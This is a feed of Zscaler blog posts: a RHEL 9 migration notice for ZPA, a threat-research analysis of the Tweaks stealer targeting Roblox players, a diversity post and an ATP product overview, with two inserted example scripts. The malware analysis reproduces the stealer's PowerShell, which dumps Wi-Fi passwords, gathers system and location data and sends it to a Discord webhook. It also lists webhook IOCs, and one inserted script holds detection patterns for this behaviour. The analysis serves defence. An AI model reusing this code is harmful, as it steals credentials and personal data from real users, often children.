We're excited to welcome the public sector community in person for a full day of learning, networking and experiences with the most forward-thinking government IT leaders. Register today to learn how you can simplify, secure and transform your agency. Space is limited for this live event, so we'll be in touch to confirm your invitation. There is no charge for the event.
Tue, 19 Mar 2024 08:03:31 -0700 Peter Amirkhan

Zscaler Selects Red Hat Enterprise Linux 9 (RHEL 9) as Next-Gen Private Access Operating System

What's new?

On June 30, CentOS 7 will reach end of life, requiring migrations in many software stacks and server environments. In advance of this, Zscaler has selected Red Hat Enterprise Linux 9 as the next-generation operating system for Zscaler Private Access™ (ZPA). RHEL 9 is the modern enterprise successor to CentOS 7, backed by Red Hat and supported through 2032. This continues ZPA's proven stability and resiliency on open source Linux platforms and builds on 10 years of maturity on Red Hat Enterprise Linux-based derivatives. What's more, this transition can be done with no impact to operations or user access.

When will it be released?

Pre-built images for all ZPA-supported platforms are targeted for release in May 2024. All ZPA images, including containers, hypervisors, and public cloud offerings, will be replaced with RHEL 9 versions. This is the recommended deployment for all future App Connector and Private Service Edge components, and customers should begin migration immediately on release. For customers that manage their own Red Hat base images, Zscaler is targeting the end of April 2024 for release of RHEL 9-native RPM packages and repositories.

New Enterprise OS Without Licensing Fees

To ensure an excellent experience for our customers, Zscaler will provide operating system licenses for all RHEL 9 images on supported platforms. This continues our commitment to secure, open source platforms without imposing additional licensing costs on our customers. We also understand the need for control over security baseline images that meet your security posture and will continue to provide RPM options through support of RHEL 8 and RHEL 9. These software packages are bring-your-own-license (BYOL) and won't conflict with any existing Red Hat enterprise license agreements you may hold.
CentOS 7 End of Life

The CentOS Project and Red Hat will end the final extended support for CentOS 7 and RHEL 7 on June 30, 2024. While we aim to provide RHEL 9 support in advance of this date (and do currently support RHEL 8 with RPMs), we recognize that the transition is a large undertaking, affecting enterprise data centers and operations, and that moving to new operating systems and software will take time. In light of this, we want to provide ample time to migrate while considering the security implications of continuing to support an obsolete operating system. Zscaler will support existing CentOS 7 deployments, RPMs, and distribution servers until December 24, 2024. We are confident our ZPA architecture and design uniquely position us to continue to support CentOS 7 past its expiry date. See End-of-Support for CentOS 7.x, RHEL 7.x, and Oracle Linux 7.x for more details on CentOS EOL and the ZPA white paper for architecture and security design. While we have ample controls in place and the utmost confidence, there is always inherent risk in using an unsupported server operating system: Zscaler will not provide backported operating system patches during this transition, but will maintain the ZPA software and its supporting security libraries.

Lightweight and Container Orchestration Ready

Following Zscaler's cloud-native and best-in-class zero trust approach, ZPA infrastructure components are designed to be lightweight, container ready, and quickly deployed. This allows App Connectors and Private Service Edges to be scaled and migrated without worrying about previously deployed instances or operating system upgrade paths. For these reasons, the migration best practice is to deploy new App Connectors and Private Service Edges. Zscaler does not provide direct operating system upgrade paths for currently deployed infrastructure components.
In further support of this, we offer Open Container Initiative (OCI) compatible images for Docker CE, Podman, and Red Hat OpenShift Platform. These images, as well as the public cloud marketplace offerings, are fully ready for autoscale groups, supporting quick scale up and scale down.

Migration and Support Excellence

Zscaler understands your concerns and will fully support you throughout this transition. Our Technical Account Managers, Support Engineers, and Professional Services are ready to address all concerns related to migration. If a temporary increase in App Connector or PSE limits is needed in your environment to complete the migration, there will be no extra licensing cost. Below are the steps to replace CentOS 7 instances with RHEL 9. The enrollment and provisioning of new App Connectors and Private Service Edges can be automated using Terraform (infrastructure as code) or container orchestration to simplify deployment further.

App Connector Migration Steps:
1. Create new App Connector Groups and provisioning keys for each location. (Note: do not reuse existing provisioning keys, as that would enroll the new RHEL 9 App Connectors into the old App Connector Groups. Mixing different host OS and Zscaler software versions in a single group is not supported.)
2. Update the new App Connector Group's version profile to "Default - el9" so that it receives the correct binary updates. (This version profile can be set as the tenant default once all connectors are moved to RHEL 9.)
3. Deploy new VMs using the upcoming RHEL 9 OVAs and the newly created provisioning keys (templates can be used).
4. Add the new App Connector Groups to each respective Server Group.
5. (Optional) In the UI, disable the old (CentOS 7) App Connector Groups five minutes before the regional off-hours maintenance window to allow connections to drain gradually.
6. During regional off-hours, remove the CentOS 7 App Connector Groups.

Private Service Edge Migration Steps:
1. Create new Service Edge Groups and provisioning keys for each location. (Note: do not reuse existing provisioning keys, as that would enroll the new RHEL 9 PSEs into the old Service Edge Groups. Mixing different host OS and Zscaler software versions in a single group is not supported.)
2. Update the new Service Edge Group's version profile to "Default - el9" so that it receives the correct binary updates. (This version profile can be set as the tenant default once all connectors and PSEs are moved to RHEL 9.)
3. Deploy new VMs using the upcoming RHEL 9 OVAs and the newly created provisioning keys (templates can be used).
4. Add trusted networks and enable "publicly accessible" (if applicable) on the new Service Edge Groups.
5. (Optional) In the UI, disable the old (CentOS 7) Service Edge Groups 15 minutes before the regional off-hours maintenance window to allow connections to drain gradually.
6. During regional off-hours, remove trusted networks and disable public access (if applicable) on the CentOS 7 Service Edge Groups.

Please reach out to your support representatives for further assistance and information as needed.
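As an added example (not Zscaler tooling, and not part of the original post), the following pre-flight check applies the rules the migration steps above state to a connector inventory before cutover: no mixed host OS inside one group, the el9 version profile on every group that holds RHEL 9 connectors, no provisioning key shared between an old and a new group, a RHEL 9 group present in every Server Group that still depends on a CentOS 7 group, and a count of remaining CentOS 7 connectors against the December 24, 2024 support date. The inventory shape (connector name/group/os, per-group version profile and provisioning key, Server Group membership) and the sample data are assumptions; an export from the ZPA admin portal or API would have to be mapped into it.

```python
"""Pre-flight check for the CentOS 7 -> RHEL 9 App Connector migration steps above.

Added example, not Zscaler tooling: it runs over a hand-built inventory of the
kind you would assemble from the ZPA admin portal or API and flags the mistakes
the steps warn about. Field names and the sample data are my own assumptions.
"""
from collections import defaultdict
from datetime import date

CENTOS7_SUPPORT_END = date(2024, 12, 24)  # end of Zscaler support for CentOS 7 deployments (from the post)
EL9_PROFILE = "default - el9"             # version profile name, compared case-insensitively


def preflight(connectors, groups, server_groups, today):
    """connectors:    [{"name", "group", "os"}], os in {"centos7", "rhel8", "rhel9"}
    groups:        {group_name: {"version_profile": str, "provisioning_key": str}}
    server_groups: {server_group_name: [app_connector_group_name, ...]}
    Returns a list of (severity, message) findings."""
    findings = []
    members = defaultdict(list)
    for c in connectors:
        members[c["group"]].append(c)
    os_of_group = {g: {c["os"] for c in cs} for g, cs in members.items()}

    # 1. a single group must not mix host OS / software versions (unsupported)
    for g, oses in os_of_group.items():
        if len(oses) > 1:
            findings.append(("error", f"group {g} mixes host OS {sorted(oses)}; put RHEL 9 connectors in a new group"))

    # 2. groups holding RHEL 9 connectors need the el9 version profile to receive the right binaries
    for g, oses in os_of_group.items():
        profile = groups[g]["version_profile"]
        if "rhel9" in oses and profile.lower() != EL9_PROFILE:
            findings.append(("error", f"group {g} holds RHEL 9 connectors but uses version profile '{profile}'"))

    # 3. a provisioning key reused from an old group enrolls new connectors into that old group
    by_key = defaultdict(set)
    for g, meta in groups.items():
        by_key[meta["provisioning_key"]].add(g)
    for key, gs in by_key.items():
        if len(gs) > 1:
            findings.append(("error", f"provisioning key {key} is shared by groups {sorted(gs)}; create a new key per group"))

    # 4. before a CentOS 7 group is removed, each Server Group using it needs a RHEL 9 group alongside
    for sg, gs in server_groups.items():
        has_c7 = any("centos7" in os_of_group.get(g, set()) for g in gs)
        has_el9 = any("rhel9" in os_of_group.get(g, set()) for g in gs)
        if has_c7 and not has_el9:
            findings.append(("warn", f"server group {sg} has no RHEL 9 connector group yet; add one before removing the CentOS 7 group"))

    # 5. remaining CentOS 7 connectors, with the support window left
    c7 = sorted(c["name"] for c in connectors if c["os"] == "centos7")
    if c7:
        days = (CENTOS7_SUPPORT_END - today).days
        sev = "error" if days < 0 else "info"
        findings.append((sev, f"{len(c7)} CentOS 7 connector(s) remain ({', '.join(c7)}); "
                              f"support ends {CENTOS7_SUPPORT_END} ({days} days)"))
    return findings


# Constructed inventory: London is mid-migration and done correctly, New York
# reused a key, left the wrong profile and mixed a RHEL 9 host into the old
# group, and Frankfurt has not started.
SAMPLE_GROUPS = {
    "LON-AC-c7":  {"version_profile": "Default",       "provisioning_key": "key-LON-old"},
    "LON-AC-el9": {"version_profile": "Default - el9", "provisioning_key": "key-LON-new"},
    "NYC-AC-c7":  {"version_profile": "Default",       "provisioning_key": "key-NYC-old"},
    "NYC-AC-el9": {"version_profile": "Default",       "provisioning_key": "key-NYC-old"},
    "FRA-AC-c7":  {"version_profile": "Default",       "provisioning_key": "key-FRA-old"},
}
SAMPLE_CONNECTORS = [
    {"name": "lon-ac-01", "group": "LON-AC-c7",  "os": "centos7"},
    {"name": "lon-ac-02", "group": "LON-AC-c7",  "os": "centos7"},
    {"name": "lon-ac-11", "group": "LON-AC-el9", "os": "rhel9"},
    {"name": "lon-ac-12", "group": "LON-AC-el9", "os": "rhel9"},
    {"name": "nyc-ac-01", "group": "NYC-AC-c7",  "os": "centos7"},
    {"name": "nyc-ac-11", "group": "NYC-AC-el9", "os": "rhel9"},
    {"name": "nyc-ac-12", "group": "NYC-AC-c7",  "os": "rhel9"},
    {"name": "fra-ac-01", "group": "FRA-AC-c7",  "os": "centos7"},
]
SAMPLE_SERVER_GROUPS = {
    "SG-London":    ["LON-AC-c7", "LON-AC-el9"],
    "SG-NewYork":   ["NYC-AC-c7", "NYC-AC-el9"],
    "SG-Frankfurt": ["FRA-AC-c7"],
}


def run_sample(today=date(2024, 6, 1)):
    return preflight(SAMPLE_CONNECTORS, SAMPLE_GROUPS, SAMPLE_SERVER_GROUPS, today)


if __name__ == "__main__":
    for severity, message in run_sample():
        print(f"[{severity}] {message}")
```

Run it against the constructed inventory and it reports the mixed New York group, the two groups with RHEL 9 hosts still on the "Default" profile, the shared key-NYC-old, the Frankfurt Server Group with no RHEL 9 group yet, and the four CentOS 7 connectors with the days left before December 24, 2024; past that date the last finding becomes an error.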
For more information:
Zscaler Private Access Website
Zscaler Private Access | Zero Trust Network Access (ZTNA)
End-of-Support for CentOS 7.x, RHEL 7.x, and Oracle Linux 7.x
ZPA App Connector Software by Platform
ZPA Private Service Edge Software by Platform

Mon, 18 Mar 2024 15:34:32 -0700 Shefali Chinni

Tweaks Stealer Targets Roblox Users Through YouTube and Discord

Introduction

Zscaler's ThreatLabz recently discovered a new campaign distributing an infostealer called Tweaks (aka Tweaker) that targets Roblox users. Attackers are exploiting popular platforms, like YouTube and Discord, to distribute Tweaks to Roblox users, capitalizing on the ability of legitimate platforms to evade detection by web filter block lists that typically block known malicious servers. Attackers share malicious files disguised as Frames Per Second (FPS) optimization packages with users and, in turn, users infect their own systems with Tweaks malware. Given that 45% of Roblox users are under 13, it's probable that the malware being circulated could extend to parents' systems. Furthermore, with the proliferation of remote work, there's a possibility of this malware infiltrating corporate devices (surreptitiously) used by children of employees. Not only does a successful infection leave Roblox account data vulnerable, but it may also compromise the data and device. In this blog, we analyze the Tweaks attack campaign and its technical characteristics.

Key Takeaways
- The Tweaks or Tweaker stealer masquerades as a tool to enhance frames per second (FPS) for Roblox users while stealing data in the background without the user's knowledge.
- The attackers leverage YouTube by enticing users to watch videos on "How to increase FPS" that contain links to their Discord groups.
- Once users join these groups, the attackers provide them with links to malicious files disguised as game tweaks and modifications.
- The stealer is PowerShell-based and exfiltrates sensitive data like user information, location, Wi-Fi profiles and passwords, Roblox IDs, and in-game currency details.
- Once sensitive data is obtained, it is sent via a Discord webhook to the attacker-controlled server.
- ThreatLabz researchers discovered multiple attackers copying a "free" version of Tweaks and using it to sell "paid" versions.

Background

Why is FPS appealing to Roblox users?

Roblox boasts a massive user base of millions of players worldwide. It offers a diverse range of games and experiences, allowing players to explore virtual worlds and engage in various activities. One thing that attracts Roblox players is the desire for an enhanced gaming experience, including improved FPS. Higher FPS can result in smoother gameplay, making it an appealing prospect for players seeking optimal performance. It's not unusual for gamers to download optimization tools from popular platforms like YouTube and Discord to increase their hardware performance, making it more likely that a gamer might unintentionally download the Tweaks malware.

Gaming sees more cyber attacks

Roblox's significant user base of 71.5 million daily active users makes it an attractive target for cyber attackers. In addition, a 2024 report shows that the gaming industry is now worth around $455.27 billion. In light of these trends, it is not surprising that hackers looking to exploit and monetize sensitive data are targeting Roblox users, who, like many other gamers, store a wealth of data in their gaming accounts.

Campaign Analysis

During our investigation, we discovered several YouTube channels and videos offering tutorials on how to improve FPS in Roblox.
In these videos, Roblox players were instructed to disable their antivirus software to ensure the smooth operation of a "PC optimizer" without encountering any issues. In reality, this tactic is used to make a user's system easier to infect with malware. In the description boxes of these videos, links to the attacker's corresponding Discord groups are provided. Figure 1 below shows a Tweaks YouTube channel, the Discord group links provided to the user, and the initial Tweaks interface that appears when users download the initial file.
Figure 1: An example of a Tweaks YouTube channel, links to Discord groups, and the Tweaks interface.

Once they enter the attacker-controlled Discord channels, users encounter both free and paid versions of FPS optimization files. Our initial analysis revealed that both versions were identical, using the same BAT file. Consequently, the choice between the free and paid versions had no impact on the outcome; the only distinction was that users who opted for the paid version suffered a small financial loss on top of having their data stolen. Presently, attackers entice new users by offering a free version with limited optimization features alongside a paid version that promises more advanced optimization capabilities. Once users download the files, they unknowingly install the Tweaks malware, which not only infects their system but also puts their data at risk of being stolen. From the user's perspective, everything seems normal, as the Tweaks malware genuinely performs some FPS optimization. This deceptive behavior makes users less suspicious, since the tool appears to be fulfilling its intended purpose.
Figure 2 below shows both the paid and free versions of Tweaks on the Discord channel.
Figure 2: An example of the Discord group advertising FPS optimization files to distribute Tweaks malware.

Case Study 1

After joining the Discord group, Roblox gamers are directed to download a malicious BAT file from a Mediafire link, leading to a malware infection. Once the malware is executed, the BAT file presents users with the Tweaks menu interface while simultaneously stealing their information in the background. The stolen data is then sent via Discord webhooks to an attacker-controlled server. The figure below illustrates the Tweaks attack chain.
Figure 3: The Tweaks attack chain involving a Discord group supplying a BAT file.

Case Study 2

Upon further investigation, we discovered that Tweaks was being sold on Discord. Two versions are available for purchase: the Beta Menu and the Paid Menu. The malware author converted the BAT file into an EXE file and then placed the EXE file inside a password-protected ZIP archive. This new iteration employs the same stealing capabilities as the BAT file discussed in Case Study 1. The figure below illustrates the Tweaks attack chain for Case Study 2.
Figure 4: The Tweaks attack chain involving a Discord group supplying an EXE file inside a ZIP archive.

Capabilities

The Tweaks malware can steal the following data:
- User's Wi-Fi profiles and passwords
- UUID and usernames
- User location
- IP address and time
- System information
- Roblox ID and in-game currency information

Technical Analysis

The following analysis covers the technical characteristics of Case Study 1 and Case Study 2 for Tweaks.

Case Study 1

1.
1. BAT files establish webhooks: Once the user downloads and executes the BAT file, the malware establishes the necessary webhook URLs using the PowerShell commands below:

"$payload = [PSCustomObject]@{ embeds = @($embedObject) };" ^
"Invoke-RestMethod -Uri $webHookUrl -Body ($payload | ConvertTo-Json -Depth 4) -Method Post -ContentType 'application/json';"

The file embeds the stolen data within the webhook payload, ensuring its transmission to the attackers.

2. Wi-Fi profile and password theft: The malware steals Wi-Fi profiles and passwords with the PowerShell command below:

“$wifiProfiles = (netsh wlan show profiles | Select-String 'All User Profile' | ForEach-Object { $_.ToString().Split(':')[1].Trim() } | ForEach-Object { $ssid = $_; $pwd = (netsh wlan show profile name=$ssid key=clear) | Select-String 'Key Content' | ForEach-Object { $_.ToString().Split(':')[1].Trim() }; if ($pwd) { Write-Output ('SSID: ' + $ssid + ', Password: ' + $pwd) } else { Write-Output 'SSID: ' + $ssid + ', Password: NO PASSWORDS FOUND' } });”

The code sample above is also shown in Figure 5 below.

Figure 5: Tweaks code showing the webhook setup and Wi-Fi profile/password theft.

3. Using WMI to harvest system information: The malware leverages Windows Management Instrumentation (WMI) to collect the machine UUID, reads the username from the environment, and retrieves the user's location from a web-based IP lookup, including the following fields: country, region, city, and approximate location. The PowerShell code looks like this:

"$hwid = (Get-WmiObject win32_computersystemproduct | Select-Object -ExpandProperty UUID);" ^
"$pcUsername = $env:USERNAME;"
"$ipInfo = Invoke-RestMethod -Uri '';" ^
"$country = $;" ^
"$region = $ipInfo.region;" ^
"$city = $;" ^
"$location = $ipInfo.loc;"

The code sample above, along with the user’s location and username, is shown in Figure 6 below.

Figure 6: Tweaks code showing the theft of the UUID, username, and the user’s location.
4. Additional data theft: In addition, the malware collects IP information (private and public IP addresses), the current time, system information, the Roblox ID, and in-game currency information. The IP addresses and the current time are collected using the following PowerShell code:

"$publicIp = (Invoke-RestMethod -Uri '').ip;" ^
"$privateIp = (Test-Connection -ComputerName $env:COMPUTERNAME -Count 1).IPV4Address.IPAddressToString;" ^
"$currentTime = Get-Date -Format 'yyyy-MM-dd HH:mm:ss';" ^
"$description = 'Public IP: ' + $publicIp + ' - Private IP: ' + $privateIp + ' - Current Time: ' + $currentTime;"

The system information, Roblox ID, and currency information are collected with the code shown in Figure 7 below.

Figure 7: Tweaks code showing the collection of system information, Roblox ID, and in-game currency details.

Case Study 2
In Case Study 2, when the user follows the link mentioned in the Discord group, a ZIP archive containing an EXE file is downloaded. Once the user executes the EXE file, it displays the Tweaks menu interface, similar to Case Study 1.

The malware creates a randomly named folder in the Temp directory (in this sample, C:\Users\<user_name>\AppData\Local\Temp\F9B9.tmp) and drops a BAT file in that directory, as shown in the screenshot below.

Figure 8: The process tree of the Tweaks EXE file.

The source code of the dropped BAT file is similar to the BAT file used in Case Study 1, and its functionality is the same.

Conclusion
Attackers are leveraging popular community platforms like YouTube and Discord to distribute Tweaks malware and steal sensitive data. They capitalize on the legitimate reputation of YouTube and Discord communities to trick victims into inadvertently downloading (and in some cases paying for) their own malware infections. To mitigate these risks, Roblox users (and all gamers) should prioritize using legitimate apps from reputable and secure sources and avoid unknown or unverified application origins.
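For defenders who need to triage scripts like the ones quoted in the technical analysis above, here is an added example (not code from this report or from Zscaler) that scans PowerShell text for the collection behaviours described in steps 1 through 4 and maps each hit to the technique IDs listed in this report's MITRE ATT&CK table. The sample script, the placeholder Discord webhook URL, the geolocation URL and the indicator patterns are all constructed for this example; the Roblox and system-information collection shown only in Figure 7 is not covered because its code is not reproduced in the text.

```python
"""Triage helper for PowerShell script text (script-block logs, dropped .bat/.ps1
files): flags the Tweaks stealer behaviours described above and maps them to the
ATT&CK technique IDs the report lists. Added example; the sample script, URLs and
patterns are constructed, not taken from the malware."""
import re

# (indicator name, pattern, ATT&CK ID from the report's table, or None where the
# table has no entry for that behaviour)
INDICATORS = [
    ("wifi_profile_enum",
     re.compile(r"netsh\s+wlan\s+show\s+profiles?\b", re.I), "T1016.002"),
    ("wifi_key_clear",
     re.compile(r"netsh\s+wlan\s+show\s+profile\b.*\bkey=clear\b", re.I), "T1016.002"),
    ("wmi_uuid",
     re.compile(r"Get-WmiObject\s+win32_computersystemproduct\b.*\bUUID\b", re.I), "T1047"),
    ("ip_geolocation",
     re.compile(r"\(Invoke-RestMethod\s+-Uri\s+[^)]*\)\.ip\b"
                r"|\$ipInfo\.(?:loc|region|city|country)\b", re.I), "T1016"),
    ("discord_webhook_post",
     re.compile(r"Invoke-RestMethod\b[^;\n]*-Uri\s+\$webHookUrl\b[^;\n]*-Method\s+Post",
                re.I), None),
]

WEBHOOK_RE = re.compile(
    r"https?://(?:discord|discordapp)\.com/api/webhooks/\d+/[A-Za-z0-9_-]+", re.I)


def scan_script(text):
    """Return [(indicator, technique_id, matched_text), ...] for every indicator that fires."""
    hits = []
    for name, pattern, technique in INDICATORS:
        m = pattern.search(text)
        if m:
            hits.append((name, technique, m.group(0)))
    return hits


def techniques(text):
    """Sorted, de-duplicated ATT&CK IDs supported by the script text."""
    return sorted({t for _, t, _ in scan_script(text) if t})


def find_webhooks(text):
    """Discord webhook URLs found in the text, defanged so they are safe to paste into a ticket."""
    return [u.replace(".com/", "[.]com/", 1) for u in WEBHOOK_RE.findall(text)]


def is_tweaks_like(text):
    """Verdict: at least one data-collection indicator plus a Discord webhook exfil channel."""
    names = {n for n, _, _ in scan_script(text)}
    collection = names & {"wifi_key_clear", "wmi_uuid", "ip_geolocation"}
    exfil = "discord_webhook_post" in names or bool(find_webhooks(text))
    return bool(collection) and exfil


# Constructed sample resembling the report's snippets (placeholder URLs, not real infrastructure).
SAMPLE_SCRIPT = r"""
$hwid = (Get-WmiObject win32_computersystemproduct | Select-Object -ExpandProperty UUID);
$pcUsername = $env:USERNAME;
$ipInfo = Invoke-RestMethod -Uri 'https://geo.example/json';
$location = $ipInfo.loc;
$wifiProfiles = (netsh wlan show profiles | Select-String 'All User Profile' | ForEach-Object { $ssid = $_; $pwd = (netsh wlan show profile name=$ssid key=clear) | Select-String 'Key Content' });
$webHookUrl = 'https://discord.com/api/webhooks/000000000000000000/PLACEHOLDER_TOKEN';
Invoke-RestMethod -Uri $webHookUrl -Body ($payload | ConvertTo-Json -Depth 4) -Method Post -ContentType 'application/json';
"""

# Constructed benign script: nothing above should fire on it.
BENIGN_SCRIPT = r"""
$currentTime = Get-Date -Format 'yyyy-MM-dd HH:mm:ss';
Write-Output ('Report generated at ' + $currentTime);
"""

if __name__ == "__main__":
    for name, tid, evidence in scan_script(SAMPLE_SCRIPT):
        print(f"{name:22} {tid or '-':10} {evidence[:60]}")
    print("webhooks:", find_webhooks(SAMPLE_SCRIPT))
    print("verdict:", is_tweaks_like(SAMPLE_SCRIPT))
```

The patterns are deliberately narrow (the exact cmdlet and parameter combinations quoted in the analysis) so that an administrator's own netsh or Get-WmiObject usage does not trip the verdict; only the combination of a collection indicator with a Discord webhook exfiltration call is treated as Tweaks-like.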
By adhering to these precautions, gamers can enhance their cybersecurity defenses and protect themselves from potential malware threats.

Zscaler Sandbox Coverage
During our investigation of this campaign, the Zscaler Sandbox played a crucial role in analyzing the behavior of various files. Through sandbox analysis, threat scores and the specific MITRE ATT&CK techniques triggered were identified.

Figure 9: Sandbox report

Detection names: Win32.PWS.TWEAKS, BAT.PWS.TWEAKS

MITRE ATT&CK Techniques
ID          Technique Name
T1566       Phishing
T1082       System Information Discovery
T1064       Scripting
T1010       Application Window Discovery
T1047       Windows Management Instrumentation
T1016.002   Wi-Fi Discovery
T1016       System Network Configuration Discovery
T1059       Command and Scripting Interpreter
T1018       Remote System Discovery
T1562       Disable or Modify Tools

Indicators Of Compromise (IOCs)
MD5                               File Type
e35864892846be3462139f9534d5ddb5  EXE
0e8d32259b06ab01cd04587b1ae5d0c1  BAT

Webhook URLs
https://discord[.]com/api/webhooks/1193562861071511683/Y3e960iiIYKeT-2hq8c0VDuprdKTD3u5F1f0AKfPQnQde8CoXnK2HzVoVGb6mBgXTsc6
https://discordapp[.]com/api/webhooks/1197341553404956752/xoPYo_fCPQGLsUIBrreFz05R9JuX_K4L96ResReZ7oLtj1za6QSYlCuMnTB8raMpVqCw

YouTube Channels
[.]com/@cartistweaks/videos
[.]com/@fraidtweaks

Tue, 12 Mar 2024 14:52:56 -0700 Preet Kamal

To Help Build a More Inclusive Future, Develop Yourself
An organization's success comes down to its people, and fostering diversity in the workforce amplifies a business's ability to navigate complex challenges. Women bring unique skills and perspectives that contribute significantly to a company's effectiveness. From innovation and effective communication to adept problem-solving and inspiring leadership, women enrich the professional landscape with a diverse array of talents.

I am proud to be the global president of WIZE (Women in Zscaler Engage), Zscaler’s women-led employee resource group. This week we kicked off our month-long celebration for Women’s History Month and International Women’s Day.
We are continuing to engage in tough conversations both regionally and globally with our allies to elevate women’s voices. There is still a great amount of work that must be done both today and for future generations of women and girls.

As Kavitha Mariappan, EVP, Customer Experience & Transformation and WIZE executive sponsor, said in her opening remarks at our IWD celebration, “You all are role models to so many in our industry. This is important. Studies show Gen Z girls are 20 percent more likely than boys to say they won’t pursue a STEM career because they don’t feel they would be good at it.”

As a woman in tech and mother of five, stats like this push me to expose girls to the importance of STEM and encourage our allies to use their voices. We need everyone involved in this effort!

Dr. Gena Cox joined us for our virtual celebrations to share her valuable insights on spearheading inclusion within the organization and the significance of respect, with an emphasis on those who are underrepresented. Dr. Cox shared her model on how everyone should feel valued, seen and heard.

As I reflected on Dr. Cox’s keynote, I thought about ways I can, and should, be modeling respect in my professional and personal life. What could I do or say to impact someone’s day, life, or career? We all have a voice and platform, we just need to be shown how and when to use it.

I am standing up for women’s rights, for equality in the tech industry, and as a mother I will always stand behind my children and seek to positively impact their future. I believe that, in 2024, we are another step closer to creating a more inclusive environment for future generations, and each individual act matters. This doesn’t just mean in our professional careers, it means taking it into our personal lives.

I am invested in myself. I am dedicated to my personal growth and self-improvement to create the best version of myself.

I am invested in my children and my family.
As a working mother, I am continuously learning to skillfully balance the demands of my professional career while being active in my children’s lives. I am committed to showing each of them that they are valued, heard, seen, and loved.

I am invested in my community. I am passionate about community engagement in my personal and professional lives. I will continue to empower others and reinforce among allies the importance of collaboration through education while leading by example.

Zscaler’s WIZE International Women’s Day celebration also recognized 28 women from around the world with a WIZE Award for their commitment and dedication to making an inclusive workplace through mentorship, community engagement, leadership, going the extra mile, and serving our customers.

Thank you to all of our winners and our greater WIZE community for your continued support and efforts to create a safe environment where we can bring our authentic selves to work. We hope you join us in celebrating Women’s History Month and International Women’s Day 2024! To learn more about the amazing women of Zscaler, watch this video and explore the content below:

What to Read Next:
This International Women’s Day, let’s pull up a chair for all of our women colleagues
The ascendency of inclusion: A conversation with Dr. Gena Cox
Celebrating Women at Zscaler: WIZE Woman of Impact in APJ: Sandra Wang
WIZE Women of Impact: Wendy Bartijn

Sun, 10 Mar 2024 17:24:56 -0700 Julia Cummings

Outpace Attackers with AI-Powered Advanced Threat Protection
Securing access to the internet and applications for any user, device, or workload connecting from anywhere in the world means preventing attacks before they start. Zscaler Advanced Threat Protection (ATP) is a suite of AI-powered cyberthreat and data protection services included with all editions of Zscaler Internet Access (ZIA) that provides always-on defense against complex cyberattacks, including malware, phishing campaigns, and more.
Leveraging real-time AI risk assessments informed by threat intelligence that Zscaler harvests from more than 500 trillion daily signals, ATP stops advanced phishing, command-and-control (C2) attacks, and other tactics before they can impact your organization. In aggregate, Zscaler operates the largest global security cloud across 150 data centers and blocks more than 9 billion threats per day. Additionally, our platform consumes more than 40 industry threat intelligence feeds for further analysis and threat prevention.

With ATP you can:
Allow, block, isolate, or alert on web pages based on AI-determined risk scores
Block malicious content, files, botnet, and C2 traffic
Stop phishing, spyware, cryptomining, adware, and webspam
Prevent data loss via IRC or SSH tunneling and C2 traffic
Block cross-site scripting (XSS) and P2P communications to prevent malicious code injection and file downloads

To provide this protection, Zscaler inspects traffic—encrypted or unencrypted—to block attackers’ attempts to compromise your organization. Zscaler ThreatLabz found in 2023 that 86% of threats are now delivered over encrypted channels, underscoring the need to thoroughly inspect all traffic.

Enabling protection against these threats takes just a few minutes in ATP in the Zscaler Internet Access management console. This blog will help you better understand the attack tactics ATP prevents on a continuous basis. We recommend that you select “Block” for all policy options and set the "Suspicious Content Protection" risk tolerance setting to "Low" in the ATP configuration panel of the ZIA management console.

Prevent web content from compromising your environment
Threat actors routinely embed malicious scripts and applications on legitimate websites they’ve hacked. ATP policy protects your traffic from fraud, unauthorized communication, and other malicious objects and scripts.
To bolster your organization's web security, the Zscaler ATP service identifies these objects and prevents them from downloading unwanted files or scripts onto an endpoint device via the user’s browser.

Using multidimensional machine learning models, the ZIA service applies inline AI analysis to examine both a web page URL and its domain to create Page Risk and Domain Risk scores. Given the magnitude of Zscaler’s dataset and threat intelligence inputs, risk scoring is not dependent on specific indicators of compromise (IOCs) or patterns. Using AI/ML to analyze web pages reveals malicious content including injected scripts, vulnerable ActiveX, and zero-pixel iFrames. The Domain Risk score results from analysis of the contextual data of a domain, including hosting country, domain age, and links to high-risk top-level domains.

The Page Risk and Domain Risk scores are then combined to produce a single Page Risk score in real time, which is displayed on a sliding scale. This risk score is then evaluated against the Page Risk value you set in the ATP configuration (as shown below). Zscaler will block users from accessing all web pages with a Page Risk score higher than the value you set. You can set the Page Risk value based on your organization’s risk tolerance.

Disrupt automated botnet communication
A botnet is a group of internet-connected devices, each of which runs one or more bots, or small programs, that are collectively used for service disruption, or for financial or sensitive information theft, via distributed denial-of-service (DDoS) attacks, spam campaigns, or brute-forcing systems. The threat actor controls the botnet using command-and-control software.

Command & Control Servers
An attacker uses a C2 server to send instructions to systems compromised by malware and retrieve stolen data from victim devices.
Enabling this ATP policy blocks communication to known C2 servers, which is key to preventing attackers from communicating with malicious software deployed on victims’ devices.

Command & Control Traffic
This refers to botnet traffic that sends or receives commands to and from unknown servers. The Zscaler service examines the content of requests and responses to unknown servers. Enabling this control in the ATP configuration blocks this traffic.

Block malicious downloads and browser exploits

Malicious Content & Sites
Websites that attempt to download dangerous content to the user's browser upon loading a page introduce considerable risk: this content can be downloaded silently, without the user's knowledge or awareness. Malicious content could include exploit kits, compromised websites, and malicious advertising.

Vulnerable ActiveX Controls
An ActiveX control is a software program for Internet Explorer, often referred to as an add-on, that performs specific functionality after a web page loads. Threat actors can use ActiveX controls to masquerade as legitimate software when, in reality, they use them to infiltrate an organization’s environment.

Browser Exploits
Known web browser vulnerabilities can be exploited, including exploits targeting Internet Explorer and Adobe Flash. Despite Adobe sunsetting the browser-based add-on in January 2021, Flash components are still found embedded in systems, some of which may be critical for infrastructure or data center operations.

Foil digital fraud and cryptomining attempts

AI-Powered Phishing Detection
Phishing is becoming harder to stop with new tactics, including phishing kits sold on the black market—these kits enable attackers to spin up phishing campaigns and malicious web pages that can be updated in a matter of hours. Phishing pages trick users into submitting their credentials, which attackers use in turn to compromise victims’ accounts.
Phishing attacks remain problematic because even unsophisticated criminals can simply buy kits on the dark web. Threat actors can also update phishing pages more quickly than most security solutions meant to detect and prevent phishing can keep up with. But with Zscaler ATP, you can prevent compromises from patient-zero phishing pages inline with advanced AI-based detection.

Known Phishing Sites
Phishing websites mimic legitimate banking and financial sites to fool users into thinking they can safely submit account numbers, passwords, and other personal information, which criminals can then use to steal their money. Enable this policy to prevent users from visiting known phishing sites.

Suspected Phishing Sites
